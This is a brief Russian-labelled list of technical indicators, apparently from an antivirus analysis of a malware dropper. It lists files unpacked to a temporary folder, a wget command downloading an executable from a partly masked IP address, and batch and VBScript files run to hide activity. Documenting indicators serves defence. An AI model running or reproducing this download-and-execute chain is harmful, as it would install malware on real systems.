Техническая информация
- %TEMP%\RarSFX0\cssrs.exe
- %TEMP%\RarSFX0\wget.exe http://94.##.228.152/squirrelmail/data/cssrs.exe
- %TEMP%\RarSFX0\cssrs.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\RarSFX0\file.bat" "
- <SYSTEM32>\wscript.exe "%TEMP%\RarSFX0\hidebat.vbs"
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\cssrs.exe
- %TEMP%\RarSFX0\file.bat
- %TEMP%\RarSFX0\hidebat.vbs
- %TEMP%\RarSFX0\cssrs.exe
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\hidebat.vbs
- '94.##.228.152':80
- 94.##.228.152/squirrelmail/data/cssrs.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''